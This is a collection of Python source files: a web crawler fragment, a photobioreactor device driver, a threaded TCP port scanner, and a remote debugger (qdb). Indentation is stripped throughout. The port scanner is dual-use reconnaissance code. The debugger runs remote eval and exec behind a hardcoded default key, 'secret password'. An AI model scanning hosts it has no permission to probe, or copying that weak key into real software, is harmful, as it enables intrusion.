_, data, found_urls = extract(url)
except Exception:
continue
result.append((depth, url, data)) # GIL :(
for found in found_urls:
fetch_queue.put((depth + 1, found))
finally:
fetch_queue.task_done()
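
# Standalone sketch of the Queue hand-off used above (assumption: extract() and
# canonicalize() live in e01extract, which is not shown here, so this demo squares
# integers instead of fetching URLs). It isolates the task_done()/join() handshake
# that lets crawl_parallel() wait for the daemon workers to drain the queue.
def _queue_pattern_demo():
    work_queue = Queue()
    results = []

    def worker():
        while True:
            item = work_queue.get()
            try:
                results.append(item * item)  # stand-in for real work
            finally:
                work_queue.task_done()       # always ack, even if the work fails

    for _ in range(3):
        Thread(target=worker, daemon=True).start()
    for n in range(10):
        work_queue.put(n)
    work_queue.join()  # returns once every queued item has been acknowledged
    return sorted(results)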
def main():
result = crawl_parallel(argv[1], int(argv[2]))
print_crawl(result)
if __name__ == '__main__':
main()
|
PBR.py
|
from threading import Thread, Event
from time import sleep
from core.device.abstract import Connector
from core.log import Logger
from custom.devices.Phenometrics.libs.communication import Connection
class PBR(Connector):
class PumpManager:
def __init__(self, device_id, connection: Connection):
self.connection = connection
self.device_id = device_id
self._pump = Event()
self.discarded = Event()
t = Thread(target=self._run)
t.start()
self.success = None
def _run(self):
while not self.discarded.is_set():
self._pump.wait()
while self._pump.is_set():
try:
self.success, result = self.connection.send_command(self.device_id, 'setAux2', [1])
sleep(20)
self.success, result = self.connection.send_command(self.device_id, 'setAux2', [0])
except Exception as exc:
Logger.error(exc)
self.success = None
def start_pump(self):
self._pump.set()
# while we do not know whether the commands are going through or not
while self.success is None:
continue
# if the commands are not going through, stop the process
if not self.success:
self.stop_pump()
return self.success
def stop_pump(self):
self._pump.clear()
return True
def discard(self):
self.discarded.set()
def __init__(self, config: dict):
self.host_address = None
self.host_port = None
self.encryption_key = None
super(PBR, self).__init__(config)
self.connection = Connection(self.host_address,
self.host_port,
self.encryption_key)
self.interpreter = {
"1": self.get_temp_settings,
"2": self.get_temp,
"3": self.set_temp,
"4": self.get_ph,
"5": self.measure_od,
"6": self.get_pump_params,
"7": self.set_pump_params,
"8": self.set_pump_state,
"9": self.get_light_intensity,
"10": self.set_light_intensity,
"11": self.turn_on_light,
"12": self.get_pwm_settings,
"13": self.set_pwm,
"14": self.get_o2,
"15": self.set_thermoregulator_state,
"16": self.measure_ft,
"17": self.get_co2,
"18": self.measure_all,
"19": self.measure_AUX,
"20": self.flash_LED,
"21": self.get_hardware_address,
"22": self.get_cluster_name
}
self.disableGUI()
self.pump_manager = PBR.PumpManager(self.device_id, self.connection)
def get_temp_settings(self):
"""
Get information about currently set temperature, maximal and
minimal allowed temperature.
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def get_temp(self):
"""
Get current temperature in Celsius degree.
:return: The current temperature.
"""
success, result = self.connection.send_command(self.device_id, 'measureTemperature', [])
if not success:
raise Exception(result)
return {'temp': float(result)}
def set_temp(self, temp):
"""
Set desired temperature in Celsius degree.
:param temp: The temperature.
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'setTemperature', [temp])
if not success:
raise Exception(result)
return {'success': float(result) == temp}
def get_ph(self):
"""
        Get current pH (dimensionless).
        :param repeats: the number of measurement repeats
        :param wait: waiting time between individual repeats
:return: The current pH.
"""
success, result = self.connection.send_command(self.device_id, 'measurePH', [])
if not success:
raise Exception(result)
return {'pH': float(result)}
def measure_od(self, channel=0):
"""
Measure current Optical Density (OD, dimensionless).
:param channel: which channel should be measured
:return: Measured OD
"""
variant = ["measureOD1", "measureOD2"]
success, result = self.connection.send_command(self.device_id, variant[channel], [])
if not success:
raise Exception(result)
return {'od': float(result), "channel": channel}
def get_pump_params(self, pump):
"""
Get parameters for given pump.
:param pump: Given pump
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_pump_params(self, pump, direction, flow):
"""
Set up the rotation direction and flow for given pump.
:param pump: Given pump
:param direction: Rotation direction (1 right, -1 left)
:param flow: Desired flow rate
:return: True if was successful, False otherwise.
"""
raise NotImplementedError("The method not implemented")
def set_pump_state(self, on):
"""
Turns on/off given pump.
:param pump: device_id of a pump
:param on: True to turn on, False to turn off
:return: True if was successful, False otherwise.
"""
result = self.pump_manager.start_pump() if on else self.pump_manager.stop_pump()
return {'success': result}
def get_light_intensity(self, channel):
"""
Checks for current (max?) light intensity.
Items: "intensity": current light intensity (float) in μE,
"max": maximal intensity (float) in μE,
"on": True if light is turned on (bool)
:param channel: Given channel device_id
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_light_intensity(self, channel, intensity):
"""
Control LED panel on photobioreactor.
:param channel: Given channel (0 for red light, 1 for blue light)
:param intensity: Desired intensity
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'setSolarLED', [intensity])
if not success:
raise Exception(result)
return {'success': float(result) == float(intensity)}
def turn_on_light(self, channel, on):
"""
Turn on/off LED panel on photobioreactor.
:param channel: Given channel
:param on: True turns on, False turns off
:return: True if was successful, False otherwise.
"""
raise NotImplementedError("The method not implemented")
def get_pwm_settings(self):
"""
Checks for current stirring settings.
Items: "pulse": current stirring in %,
"min": minimal stirring in %,
"max": maximal stirring in %,
"on": True if stirring is turned on (bool)
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_pwm(self, value, on):
"""
Set stirring settings.
Channel: 0 red and 1 blue according to PBR configuration.
:param value: desired stirring pulse
:param on: True turns on, False turns off
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'setStir', [value])
if not success:
raise Exception(result)
return {'success': float(result) == float(value)}
def get_o2(self, raw=True, repeats=5, wait=0):
"""
Checks for concentration of dissociated O2.
Items: "pulse": current stirring in %,
"min": minimal stirring in %,
"max": maximal stirring in %,
"on": True if stirring is turned on (bool)
:param raw: True for raw data, False for data calculated according to temperature calibration
:param repeats: the number of measurement repeats
        :param wait: waiting time between individual repeats
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_thermoregulator_state(self, on):
"""
Set state of thermoregulator.
:param on: 1 -> on, 0 -> freeze, -1 -> off
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'stopTemperatureControl', [])
if not success:
raise Exception(result)
return {'success': result == "stopTemperatureControl"}
def measure_ft(self, channel):
"""
???
:param channel: ???
:return: ???
"""
raise NotImplementedError("The method not implemented")
def get_co2(self, raw, repeats):
"""
TBA
:param raw: True for raw data, False for data ???
:param repeats: the number of measurement repeats
:return:
"""
raise NotImplementedError("The method not implemented")
def measure_all(self, ft_channel=5, pump_id=5):
"""
Measures all basic measurable values.
:param ft_channel: channel for ft_measure
:param pump_id: id of particular pump
:return: dictionary of all measured values
"""
measure_all_dictionary = dict()
measure_all_dictionary["pwm_settings"] = False, "pwm settings not available for this device"
measure_all_dictionary["light_0"] = False, "light_0 not available for this device"
measure_all_dictionary["light_1"] = False, "light_1 not available for this device"
try:
measure_all_dictionary["od_0"] = True, self.measure_od(0)
except Exception:
measure_all_dictionary["od_0"] = False, "Cannot get od_0"
try:
measure_all_dictionary["od_1"] = True, self.measure_od(1)
except Exception:
measure_all_dictionary["od_1"] = False, "Cannot get od_1"
try:
measure_all_dictionary["ph"] = True, self.get_ph(),
except Exception:
measure_all_dictionary["ph"] = False, "Cannot get ph"
try:
measure_all_dictionary["temp"] = True, self.get_temp(),
except Exception:
measure_all_dictionary["temp"] = False, "Cannot get temp"
measure_all_dictionary["pump"] = False, "pump settings not available for this device"
measure_all_dictionary["o2"] = False, "o2 settings not available for this device"
measure_all_dictionary["co2"] = False, "co2 settings not available for this device"
measure_all_dictionary["ft"] = False, "ft settings not available for this device"
return measure_all_dictionary
def measure_AUX(self, channel):
"""
Values of AUX auxiliary input voltage.
:param channel: ???
:return: ???
"""
variant = ["measureAux1", "measureAux2"]
success, result = self.connection.send_command(self.device_id, variant[channel], [])
if not success:
raise Exception(result)
return {'aux': float(result), "channel": channel}
def flash_LED(self):
"""
Triggers a flashing sequence and is used to physically identify the PBR.
!!! random blank spaces complicate things. Is it like that also with "real" PBR?
:return: True if was successful, False otherwise
"""
success, result = self.connection.send_command(self.device_id, "flashLED", [])
if not success:
raise Exception(result)
return {'success': result.lstrip() == "flashLED"}
def get_hardware_address(self):
"""
Get the MAC address of the PBR.
:return: the MAC address
"""
success, result = self.connection.send_command(self.device_id, "getHardwareAddress", [])
if not success:
raise Exception(result)
return {'HWaddress': result.lstrip()}
def get_cluster_name(self):
"""
The name of the bioreactor array / cluster.
:return: the cluster name
"""
success, result = self.connection.send_command(self.device_id, "getMatrixName", [])
if not success:
raise Exception(result)
return {'clusterName': result.lstrip()}
def test_connection(self) -> bool:
try:
self.get_cluster_name()
return True
except Exception:
return False
def disableGUI(self):
success, result = self.connection.send_command(self.device_id, "disableGUI", [])
if not success:
raise Exception(result)
return {'success': result.lstrip() == "disableGUI"}
def enableGUI(self):
success, result = self.connection.send_command(self.device_id, "enableGUI", [])
if not success:
raise Exception(result)
# TODO: change "disableGUI" string to "enableGUI" after the bug on Phenometrics software is fixed
return {'success': result.lstrip() == "disableGUI"}
def disconnect(self):
self.enableGUI()
self.pump_manager.discard()
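

# Illustrative sketch (not part of the Phenometrics driver): PumpManager.start_pump()
# above spins in a `while self.success is None` loop, which busy-waits a CPU core.
# An Event-based handshake blocks instead; the class and method names below are
# hypothetical and exist only in this sketch.
class _FirstResultHandshake:
    def __init__(self):
        self._ready = Event()
        self._success = None

    def report(self, success):
        # called from the worker thread after the first command round-trips
        self._success = success
        self._ready.set()

    def wait_for_first_result(self, timeout=30):
        # blocks without spinning; returns None if nothing was reported in time
        if self._ready.wait(timeout):
            return self._success
        return None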
|
py_portscanner.py
|
#!/usr/bin/env python
import socket, sys
from threading import Thread
# Easily changeable variables (you can extend the timeout length if necessary)
threads = []
timeout = 0.5
# Inputs & simple error handling
try:
host = raw_input("Enter Target Host Address: ")
hostIP = socket.gethostbyname(host)
startPort = int(raw_input("Enter Starting Port to Scan: "))
endPort = int(raw_input("Enter Ending Port to Scan: "))
except KeyboardInterrupt:
print "\n\n[*]User Requested an Interrupt[*]"
sys.exit()
except socket.gaierror:
print "\n\n[*]Hostname unresolvable[*]"
sys.exit()
except socket.error:
print "\n\n[*]Unable to connect to target[*]"
sys.exit()
# Scanning Banner
print "-" * 50
print "Scanning Target: ", hostIP
print "-" * 50
# Scanning and open port display
def scanner(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(timeout)
result = sock.connect_ex((hostIP, port))
if result == 0:
print "[*] Port {}: Open".format(port)
sock.close()
# Setup threading and calling the scan
for i in range(startPort, endPort+1):
thread = Thread(target=scanner, args=(i,))
threads.append(thread)
thread.start()
[x.join() for x in threads]
# Completion Banner
print "-" * 50
print "Scanning completed!"
print "-" * 50
|
qdb.py
|
#!/usr/bin/env python
# coding:utf-8
"Queues(Pipe)-based independent remote client-server Python Debugger"
__author__ = "Mariano Reingart (reingart@gmail.com)"
__copyright__ = "Copyright (C) 2011 Mariano Reingart"
__license__ = "LGPL 3.0"
__version__ = "1.01b"
# remote debugger queue-based (jsonrpc-like interface):
# - bidirectional communication (request - response calls in both ways)
# - request with id == null is a notification (do not send a response)
# - request with a value for id is a normal call, wait response
# based on idle, inspired by the pythonwin implementation, with much code taken from pdb
import bdb
import inspect
import linecache
import os
import sys
import traceback
import cmd
import pydoc
import threading
class Qdb(bdb.Bdb):
"Qdb Debugger Backend"
def __init__(self, pipe, redirect_stdio=True, allow_interruptions=False,
skip=[__name__]):
kwargs = {}
if sys.version_info > (2, 7):
kwargs['skip'] = skip
bdb.Bdb.__init__(self, **kwargs)
self.frame = None
self.i = 1 # sequential RPC call id
self.waiting = False
self.pipe = pipe # for communication
self._wait_for_mainpyfile = False
self._wait_for_breakpoint = False
self.mainpyfile = ""
        self._lineno = None  # last listed line number
# replace system standard input and output (send them thru the pipe)
if redirect_stdio:
sys.stdin = self
sys.stdout = self
sys.stderr = self
if allow_interruptions:
# fake breakpoint to prevent removing trace_dispatch on set_continue
self.breaks[None] = []
self.allow_interruptions = allow_interruptions
self.burst = 0 # do not send notifications ("burst" mode)
self.params = {} # optional parameters for interaction
def pull_actions(self):
# receive a remote procedure call from the frontend:
# returns True if action processed
# None when 'run' notification is received (see 'startup')
request = self.pipe.recv()
if request.get("method") == 'run':
return None
response = {'version': '1.1', 'id': request.get('id'),
'result': None,
'error': None}
try:
# dispatch message (JSON RPC like)
method = getattr(self, request['method'])
response['result'] = method.__call__(*request['args'],
**request.get('kwargs', {}))
except Exception, e:
response['error'] = {'code': 0, 'message': str(e)}
# send the result for normal method calls, not for notifications
if request.get('id'):
self.pipe.send(response)
return True
# Override Bdb methods
def trace_dispatch(self, frame, event, arg):
# check for non-interaction rpc (set_breakpoint, interrupt)
while self.allow_interruptions and self.pipe.poll():
self.pull_actions()
# process the frame (see Bdb.trace_dispatch)
if self.quitting:
return # None
if event == 'line':
return self.dispatch_line(frame)
if event == 'call':
return self.dispatch_call(frame, arg)
if event == 'return':
return self.dispatch_return(frame, arg)
if event == 'exception':
return self.dispatch_exception(frame, arg)
return self.trace_dispatch
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile or self._wait_for_breakpoint:
return
if self.stop_here(frame):
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (not self.canonic(frame.f_code.co_filename).startswith(self.mainpyfile)
                    or frame.f_lineno <= 0):
return
self._wait_for_mainpyfile = 0
if self._wait_for_breakpoint:
if not self.break_here(frame):
return
self._wait_for_breakpoint = 0
self.interaction(frame)
def user_exception(self, frame, info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
if self._wait_for_mainpyfile or self._wait_for_breakpoint:
return
extype, exvalue, trace = info
        # pre-process stack trace as it isn't picklable (cannot be sent pure)
msg = ''.join(traceback.format_exception(extype, exvalue, trace))
trace = traceback.extract_tb(trace)
title = traceback.format_exception_only(extype, exvalue)[0]
# send an Exception notification
msg = {'method': 'exception',
'args': (title, extype.__name__, exvalue, trace, msg),
'id': None}
self.pipe.send(msg)
self.interaction(frame, info)
def run(self, code, interp=None, *args, **kwargs):
try:
return bdb.Bdb.run(self, code, *args, **kwargs)
finally:
pass
def runcall(self, function, interp=None, *args, **kwargs):
try:
self.interp = interp
return bdb.Bdb.runcall(self, function, *args, **kwargs)
finally:
pass
def _runscript(self, filename):
# The script has to run in __main__ namespace (clear it)
import __main__
import imp
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
"imp" : imp, # need for run
})
# avoid stopping before we reach the main script
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
statement = 'imp.load_source("__main__", "%s")' % filename
# notify and wait frontend to set initial params and breakpoints
self.pipe.send({'method': 'startup', 'args': (__version__, )})
while self.pull_actions() is not None:
pass
self.run(statement)
# General interaction function
def interaction(self, frame, info=None):
        # cache frame locals to ensure that modifications are not overwritten
self.frame_locals = frame and frame.f_locals or {}
# extract current filename and line number
code, lineno = frame.f_code, frame.f_lineno
filename = code.co_filename
basename = os.path.basename(filename)
message = "%s:%s" % (basename, lineno)
if code.co_name != "?":
message = "%s: %s()" % (message, code.co_name)
# wait user events
self.waiting = True
self.frame = frame
try:
while self.waiting:
# sync_source_line()
if frame and filename[:1] + filename[-1:] != "<>" and os.path.exists(filename):
line = linecache.getline(filename, self.frame.f_lineno,
self.frame.f_globals)
else:
line = ""
# send the notification (debug event) - DOESN'T WAIT RESPONSE
self.burst -= 1
if self.burst < 0:
kwargs = {}
if self.params.get('call_stack'):
kwargs['call_stack'] = self.do_where()
if self.params.get('environment'):
kwargs['environment'] = self.do_environment()
self.pipe.send({'method': 'interaction', 'id': None,
'args': (filename, self.frame.f_lineno, line),
'kwargs': kwargs})
self.pull_actions()
finally:
self.waiting = False
self.frame = None
def do_debug(self, mainpyfile=None, wait_breakpoint=1):
self.reset()
if not wait_breakpoint or mainpyfile:
self._wait_for_mainpyfile = 1
if not mainpyfile:
frame = sys._getframe().f_back
mainpyfile = frame.f_code.co_filename
self.mainpyfile = self.canonic(mainpyfile)
self._wait_for_breakpoint = wait_breakpoint
sys.settrace(self.trace_dispatch)
def set_trace(self, frame=None):
        # start debugger interaction immediately
if frame is None:
frame = sys._getframe().f_back
self._wait_for_mainpyfile = frame.f_code.co_filename
self._wait_for_breakpoint = 0
bdb.Bdb.set_trace(self, frame)
# Command definitions, called by interaction()
def do_continue(self):
self.set_continue()
self.waiting = False
def do_step(self):
self.set_step()
self.waiting = False
def do_return(self):
self.set_return(self.frame)
self.waiting = False
def do_next(self):
self.set_next(self.frame)
self.waiting = False
def interrupt(self):
self.set_step()
def do_quit(self):
self.set_quit()
self.waiting = False
def do_jump(self, lineno):
arg = int(lineno)
try:
self.frame.f_lineno = arg
return arg
except ValueError, e:
print '*** Jump failed:', e
return False
def do_list(self, arg):
last = None
if arg:
if isinstance(arg, tuple):
first, last = arg
else:
first = arg
elif not self._lineno:
first = max(1, self.frame.f_lineno - 5)
else:
first = self._lineno + 1
if last is None:
last = first + 10
filename = self.frame.f_code.co_filename
breaklist = self.get_file_breaks(filename)
lines = []
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno,
self.frame.f_globals)
if not line:
                lines.append((filename, lineno, '', '', "<EOF>\n"))  # no "current" marker at EOF; avoids an unbound name
break
else:
breakpoint = "B" if lineno in breaklist else ""
current = "->" if self.frame.f_lineno == lineno else ""
lines.append((filename, lineno, breakpoint, current, line))
self._lineno = lineno
return lines
def do_read(self, filename):
return open(filename, "Ur").read()
def do_set_breakpoint(self, filename, lineno, temporary=0, cond=None):
return self.set_break(filename, int(lineno), temporary, cond)
def do_list_breakpoint(self):
breaks = []
if self.breaks: # There's at least one
for bp in bdb.Breakpoint.bpbynumber:
if bp:
breaks.append((bp.number, bp.file, bp.line,
bp.temporary, bp.enabled, bp.hits, bp.cond, ))
return breaks
def do_clear_breakpoint(self, filename, lineno):
self.clear_break(filename, lineno)
def do_clear_file_breakpoints(self, filename):
self.clear_all_file_breaks(filename)
def do_clear(self, arg):
# required by BDB to remove temp breakpoints!
err = self.clear_bpbynumber(arg)
if err:
print '*** DO_CLEAR failed', err
def do_eval(self, arg, safe=True):
ret = eval(arg, self.frame.f_globals,
self.frame_locals)
if safe:
ret = pydoc.cram(repr(ret), 255)
return ret
def do_exec(self, arg):
locals = self.frame_locals
globals = self.frame.f_globals
code = compile(arg + '\n', '<stdin>', 'single')
save_displayhook = sys.displayhook
self.displayhook_value = None
try:
sys.displayhook = self.displayhook
exec code in globals, locals
finally:
sys.displayhook = save_displayhook
return self.displayhook_value
def do_where(self):
"print_stack_trace"
stack, curindex = self.get_stack(self.frame, None)
lines = []
for frame, lineno in stack:
filename = frame.f_code.co_filename
line = linecache.getline(filename, lineno)
lines.append((filename, lineno, "", "", line, ))
return lines
def do_environment(self):
"return current frame local and global environment"
env = {'locals': {}, 'globals': {}}
# converts the frame global and locals to a short text representation:
if self.frame:
for name, value in self.frame_locals.items():
env['locals'][name] = pydoc.cram(repr(value), 255), repr(type(value))
for name, value in self.frame.f_globals.items():
env['globals'][name] = pydoc.cram(repr(value), 20), repr(type(value))
return env
def get_autocomplete_list(self, expression):
"Return list of auto-completion options for expression"
try:
obj = self.do_eval(expression)
except:
return []
else:
return dir(obj)
def get_call_tip(self, expression):
"Return list of auto-completion options for expression"
try:
obj = self.do_eval(expression)
except Exception, e:
return ('', '', str(e))
else:
name = ''
try:
name = obj.__name__
except AttributeError:
pass
argspec = ''
drop_self = 0
f = None
try:
if inspect.isbuiltin(obj):
pass
elif inspect.ismethod(obj):
# Get the function from the object
f = obj.im_func
drop_self = 1
elif inspect.isclass(obj):
# Get the __init__ method function for the class.
if hasattr(obj, '__init__'):
f = obj.__init__.im_func
else:
for base in object.__bases__:
if hasattr(base, '__init__'):
f = base.__init__.im_func
break
if f is not None:
drop_self = 1
elif callable(obj):
# use the obj as a function by default
f = obj
# Get the __call__ method instead.
f = obj.__call__.im_func
drop_self = 0
except AttributeError:
pass
if f:
argspec = apply(inspect.formatargspec, inspect.getargspec(f))
doc = ''
if callable(obj):
try:
doc = inspect.getdoc(obj)
except:
pass
return (name, argspec[1:-1], doc.strip())
def set_burst(self, val):
"Set burst mode -multiple command count- (shut up notifications)"
self.burst = val
def set_params(self, params):
"Set parameters for interaction"
self.params.update(params)
def displayhook(self, obj):
"""Custom displayhook for the do_exec which prevents
assignment of the _ variable in the builtins.
"""
self.displayhook_value = repr(obj)
def reset(self):
bdb.Bdb.reset(self)
self.waiting = False
self.frame = None
def post_mortem(self, t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
self.reset()
# get last frame:
while t is not None:
frame = t.tb_frame
t = t.tb_next
code, lineno = frame.f_code, frame.f_lineno
filename = code.co_filename
line = linecache.getline(filename, lineno)
#(filename, lineno, "", current, line, )}
self.interaction(frame)
# console file-like object emulation
def readline(self):
"Replacement for stdin.readline()"
msg = {'method': 'readline', 'args': (), 'id': self.i}
self.pipe.send(msg)
msg = self.pipe.recv()
self.i += 1
return msg['result']
def readlines(self):
"Replacement for stdin.readlines()"
lines = []
while lines[-1:] != ['\n']:
lines.append(self.readline())
return lines
def write(self, text):
"Replacement for stdout.write()"
msg = {'method': 'write', 'args': (text, ), 'id': None}
self.pipe.send(msg)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return 0
class QueuePipe(object):
"Simulated pipe for threads (using two queues)"
def __init__(self, name, in_queue, out_queue):
self.__name = name
self.in_queue = in_queue
self.out_queue = out_queue
def send(self, data):
self.out_queue.put(data, block=True)
def recv(self, count=None, timeout=None):
data = self.in_queue.get(block=True, timeout=timeout)
return data
def poll(self, timeout=None):
return not self.in_queue.empty()
def close(self):
pass
class RPCError(RuntimeError):
"Remote Error (not user exception)"
pass
class Frontend(object):
"Qdb generic Frontend interface"
def __init__(self, pipe):
self.i = 1
self.pipe = pipe
self.notifies = []
self.read_lock = threading.RLock()
self.write_lock = threading.RLock()
def recv(self):
self.read_lock.acquire()
try:
return self.pipe.recv()
finally:
self.read_lock.release()
def send(self, data):
self.write_lock.acquire()
try:
return self.pipe.send(data)
finally:
self.write_lock.release()
def startup(self):
self.send({'method': 'run', 'args': (), 'id': None})
    def interaction(self, filename, lineno, line, **kwargs):
raise NotImplementedError
def exception(self, title, extype, exvalue, trace, request):
"Show a user_exception"
raise NotImplementedError
def write(self, text):
"Console output (print)"
raise NotImplementedError
def readline(self, text):
"Console input/rawinput"
raise NotImplementedError
def run(self):
"Main method dispatcher (infinite loop)"
if self.pipe:
if not self.notifies:
# wait for a message...
request = self.recv()
else:
                # process an asynchronous notification received earlier
request = self.notifies.pop(0)
return self.process_message(request)
def process_message(self, request):
if request:
result = None
if request.get("error"):
                # we are not supposed to get an error here;
                # it should be raised by the method call
                raise RPCError(request['error']['message'])
elif request.get('method') == 'interaction':
self.interaction(*request.get("args"), **request.get("kwargs"))
elif request.get('method') == 'startup':
self.startup()
elif request.get('method') == 'exception':
self.exception(*request['args'])
elif request.get('method') == 'write':
self.write(*request.get("args"))
elif request.get('method') == 'readline':
result = self.readline()
if result:
response = {'version': '1.1', 'id': request.get('id'),
'result': result,
'error': None}
self.send(response)
return True
def call(self, method, *args):
"Actually call the remote method (inside the thread)"
req = {'method': method, 'args': args, 'id': self.i}
self.send(req)
self.i += 1 # increment the id
while 1:
# wait until command acknowledge (response id match the request)
res = self.recv()
if 'id' not in res or not res['id']:
# nested notification received (i.e. write)! process it!
self.process_message(res)
elif 'result' not in res:
# nested request received (i.e. readline)! process it!
self.process_message(res)
elif long(req['id']) != long(res['id']):
print "DEBUGGER wrong packet received: expecting id", req['id'], res['id']
# protocol state is unknown
elif 'error' in res and res['error']:
raise RPCError(res['error']['message'])
else:
return res['result']
def do_step(self, arg=None):
"Execute the current line, stop at the first possible occasion"
self.call('do_step')
def do_next(self, arg=None):
"Execute the current line, do not stop at function calls"
self.call('do_next')
def do_continue(self, arg=None):
"Continue execution, only stop when a breakpoint is encountered."
self.call('do_continue')
def do_return(self, arg=None):
"Continue execution until the current function returns"
self.call('do_return')
def do_jump(self, arg):
"Set the next line that will be executed."
res = self.call('do_jump', arg)
print res
def do_where(self, arg=None):
"Print a stack trace, with the most recent frame at the bottom."
return self.call('do_where')
def do_quit(self, arg=None):
"Quit from the debugger. The program being executed is aborted."
self.call('do_quit')
def do_eval(self, expr):
"Inspect the value of the expression"
return self.call('do_eval', expr)
def do_environment(self):
"List all the locals and globals variables (string representation)"
return self.call('do_environment')
def do_list(self, arg=None):
"List source code for the current file"
return self.call('do_list', arg)
def do_read(self, filename):
"Read and send a local filename"
return self.call('do_read', filename)
def do_set_breakpoint(self, filename, lineno, temporary=0, cond=None):
"Set a breakpoint at filename:breakpoint"
self.call('do_set_breakpoint', filename, lineno, temporary, cond)
def do_clear_breakpoint(self, filename, lineno):
"Remove a breakpoint at filename:breakpoint"
self.call('do_clear_breakpoint', filename, lineno)
def do_clear_file_breakpoints(self, filename):
"Remove all breakpoints at filename"
        self.call('do_clear_file_breakpoints', filename)
def do_list_breakpoint(self):
"List all breakpoints"
return self.call('do_list_breakpoint')
def do_exec(self, statement):
return self.call('do_exec', statement)
def get_autocomplete_list(self, expression):
return self.call('get_autocomplete_list', expression)
def get_call_tip(self, expression):
return self.call('get_call_tip', expression)
def interrupt(self):
"Immediately stop at the first possible occasion (outside interaction)"
# this is a notification!, do not expect a response
req = {'method': 'interrupt', 'args': ()}
self.send(req)
def set_burst(self, value):
req = {'method': 'set_burst', 'args': (value, )}
self.send(req)
def set_params(self, params):
req = {'method': 'set_params', 'args': (params, )}
self.send(req)
class Cli(Frontend, cmd.Cmd):
"Qdb Front-end command line interface"
def __init__(self, pipe, completekey='tab', stdin=None, stdout=None, skip=None):
cmd.Cmd.__init__(self, completekey, stdin, stdout)
Frontend.__init__(self, pipe)
# redefine Frontend methods:
def run(self):
while 1:
try:
Frontend.run(self)
except KeyboardInterrupt:
print "Interupting..."
self.interrupt()
def interaction(self, filename, lineno, line):
print "> %s(%d)\n-> %s" % (filename, lineno, line),
self.filename = filename
self.cmdloop()
def exception(self, title, extype, exvalue, trace, request):
print "=" * 80
print "Exception", title
print request
print "-" * 80
def write(self, text):
print text,
def readline(self):
return raw_input()
def postcmd(self, stop, line):
return not line.startswith("h") # stop
do_h = cmd.Cmd.do_help
do_s = Frontend.do_step
do_n = Frontend.do_next
do_c = Frontend.do_continue
do_r = Frontend.do_return
do_j = Frontend.do_jump
do_q = Frontend.do_quit
def do_eval(self, args):
"Inspect the value of the expression"
print Frontend.do_eval(self, args)
def do_list(self, args):
"List source code for the current file"
lines = Frontend.do_list(self, eval(args, {}, {}) if args else None)
self.print_lines(lines)
def do_where(self, args):
"Print a stack trace, with the most recent frame at the bottom."
lines = Frontend.do_where(self)
self.print_lines(lines)
def do_environment(self, args=None):
env = Frontend.do_environment(self)
for key in env:
print "=" * 78
print key.capitalize()
print "-" * 78
for name, value in env[key].items():
print "%-12s = %s" % (name, value)
def do_list_breakpoint(self, arg=None):
"List all breakpoints"
breaks = Frontend.do_list_breakpoint(self)
print "Num File Line Temp Enab Hits Cond"
for bp in breaks:
print '%-4d%-30s%4d %4s %4s %4d %s' % bp
print
def do_set_breakpoint(self, arg):
"Set a breakpoint at filename:breakpoint"
if arg:
if ':' in arg:
args = arg.split(":")
else:
args = (self.filename, arg)
Frontend.do_set_breakpoint(self, *args)
else:
self.do_list_breakpoint()
do_b = do_set_breakpoint
do_l = do_list
do_p = do_eval
do_w = do_where
do_e = do_environment
def default(self, line):
"Default command"
if line[:1] == '!':
print self.do_exec(line[1:])
else:
print "*** Unknown command: ", line
def print_lines(self, lines):
for filename, lineno, bp, current, source in lines:
print "%s:%4d%s%s\t%s" % (filename, lineno, bp, current, source),
print
def test():
def f(pipe):
print "creating debugger"
qdb = Qdb(pipe=pipe, redirect_stdio=False)
print "set trace"
my_var = "Mariano!"
qdb.set_trace()
print "hello world!"
print "good by!"
saraza
if '--process' in sys.argv:
from multiprocessing import Process, Pipe
pipe, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
else:
from threading import Thread
from Queue import Queue
parent_queue, child_queue = Queue(), Queue()
front_conn = QueuePipe("parent", parent_queue, child_queue)
child_conn = QueuePipe("child", child_queue, parent_queue)
p = Thread(target=f, args=(child_conn,))
p.start()
import time
class Test(Frontend):
def interaction(self, *args):
print "interaction!", args
def exception(self, *args):
print "exception", args
#raise RuntimeError("exception %s" % repr(args))
qdb = Test(front_conn)
time.sleep(5)
while 1:
print "running..."
Frontend.run(qdb)
time.sleep(1)
print "do_next"
qdb.do_next()
p.join()
def connect(host="localhost", port=6000, authkey='secret password'):
"Connect to a running debugger backend"
address = (host, port)
from multiprocessing.connection import Client
print "qdb debugger fronted: waiting for connection to", address
conn = Client(address, authkey=authkey)
try:
Cli(conn).run()
except EOFError:
pass
finally:
conn.close()
def main(host='localhost', port=6000, authkey='secret password'):
"Debug a script and accept a remote frontend"
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print "usage: pdb.py scriptfile [arg] ..."
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print 'Error:', mainpyfile, 'does not exist'
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
